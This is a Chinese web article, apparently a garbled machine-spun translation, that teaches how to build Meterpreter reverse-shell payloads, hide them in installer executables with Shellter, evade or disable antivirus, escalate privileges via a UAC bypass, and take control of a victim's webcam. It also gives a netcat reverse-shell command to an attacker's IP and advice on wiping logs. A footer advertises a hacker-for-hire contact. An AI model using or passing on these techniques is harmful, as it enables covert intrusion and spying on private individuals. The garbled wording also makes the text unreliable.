反向壳和控制网络摄像头

如果您的网络摄像头上带一大块胶布,您很可能我听说网络黑客或NSA可以远程控制炮兵您。问题是如何?远方的人,你难见的人如何能够远程连接你的设备并控制你?

目前可能你的中央电视台,iP高清摄像头只是泄露在互联网技术上,攻击者在Shodan等网站上发现了它。你没有变更默认设置登陆密码和bam,他们在。看你的言谈举止。

物联网技术摄影机通常就是这种情况。但是,如果我们谈及您内嵌的网络摄像头,回答更可能是通过Meterpreter有效负荷。Meterpreter可以让你网络访问反向shell,这是我们将在下面介绍的内容。有关Meterpreter的其他信息,请阅读文章:

你可能在想,为什么反向壳?他们为什么不直接网络访问我的设备?还好,因为这种方法很可能会被阻拦。我们趋向于限制入站留量比出站留量更多。如果有人想要接入到您的设备,您的设备很可能会阻拦它(就算被伸出)。而且,如果您试着接入它们,则您的计算机系统更有可能让此留量通过。这意味着您的设备是想要建立接入的设备。

是一个框架结构,我们将用它来得到反向shell。它已经预装在Parrot和Kali上。让我们运作以下指令来建立Meterpreter反向TCP shell有效负荷。

任务完成。目前让我们提交那个和.......... blocked。这意味着MeterPreter是毫无疑问的有效载荷,因此大部分的杀毒软件都能够阻拦/隔離它。如果你正在处理一个目前仍旧存在的不安全的用户。

我们可以使用一个名叫Shellter的工具来试着变更哈希并将反向shell内嵌到其它文档中。通常,一个人选择将shell内嵌到安装文件中。原因是,大部分安装文件需要以管理人身分运作。犹如您稍候将见到的这样,以管理人身分运作漏洞利用程序可以完成所有艰难工作。

下一步,我们选择反向TCP shell并键入我们设备的iP和端口号(攻击者)。完成后,它会将shell内嵌到您选择的exe中,为了您可以将其上传入目标计算机系统。目前你必须使用一种复杂的方法将它放进目标设备上,但是对于这个事例,我将拷贝并黏贴。

尽管,虽然屏蔽了Meterpreter壳子,av仍尽可能检验到它。如果你就准备把它关闭,因为我能。在现实世界中,攻击者会将av偏瘫或使其盲从,为了他们可以降低有效载荷。

犹如您在右边所见到的,我们几个失败。我眼中的自己之前谈及的需要用户以管理人身分运作它的内容。这样就可以运作和引入所有脚本和DLL。如果用户以管理人身分运作它,您将见到没有失败。像这样:

这是你可以开始玩的时候。攻击者可以在您的计算机系统上实行多选操作,但如果他们想要使用网络摄像头,他们会实行以下操作:

这是一个事例,因为网络黑客不大可能运作它。这意味着做这种事情会提示别人。当你发现几台设备已经完成了日记的抹除,你可以打赌有人已经上过它了。反之,攻击者很可能会全部删除选择的恶性事件以遮盖他们的足迹。目前,它将敏锐地发现像时间差别这样的物品。

所有这些都需要管理员权限,而您的用户可能没法使用升级的管理权限运作它。那很好,因为你可以使用像bypassuac_comhijacker这样的物品。你仍旧需要得到一个反向shell,首先它可以在用户级別。

得到shell后,键入网站后台并按Enter键。这会将当今会话挪到网站后台。随后你可以像这样交換到exploitpassacac_comhijack:

如果完成,它应该给你一个管理人shell。完成此操作后,您将需要转移到更平稳的流程。并不是说你能想象空间你已经将你的反向shell掩藏在Putty exe或安装程序文档中。如果他们关掉手机应用程序,您的接入就会遗失,而您可能没法得到其它接入。这就是您希望迅速转移到不断运作的物品的原因。

犹如您所闻,Meterpreter非常强大!问题就是我迫不得已半自动停止使用安全控件。如果手机客户端是半安全的,它们很可能会阻拦您的有效负荷。这就是为啥利用系统漏洞时总是提供反向shell有效负荷的原因。利用可以容许他们上载和运作有效载荷,为了他们可以建立Meterpreter会话。

并不是得到反向shell的唯一方法。可以使用一个名叫Netcat的好看工具。犹如您在下面所见到的,您可能会有更多的运势,因为一些av经销商并不认为这是一种威协。

可以在usr / share / windows-binaries / nc.exe下的Parrot或Kali上找到Netcat 。将nc.exe上传入目标计算机系统后,我们可以运作nc.exe [Attacker iP] [Port] -e cmd.exe。这是您最有可能通过脚本自动实行的操作。

这将为您带来一个比较简单的反向shell。它只具有用户级管理权限,但那是一个起点网。随后,您可以使用它来进一步利用系统得到管理员权限。您并不总是必须拥有管理员权限才能完成大量工作。如果攻击者尽可能得到shell,他们可能只是开始偷取或删除文件。简单但有效。下面是一些运作反向shell的事例:



免责声明:文章《反向壳和控制网络摄像头》来至网络,文章表达观点不代表本站观点,文章版权属于原作者所有,若有侵权,请联系本站站长处理!



上一篇:分享几种绕过注入的方法
下一篇:反病毒工具包整理集合
您可能感兴趣:
  • 黑客接单黑客头像
  • QQ:58241689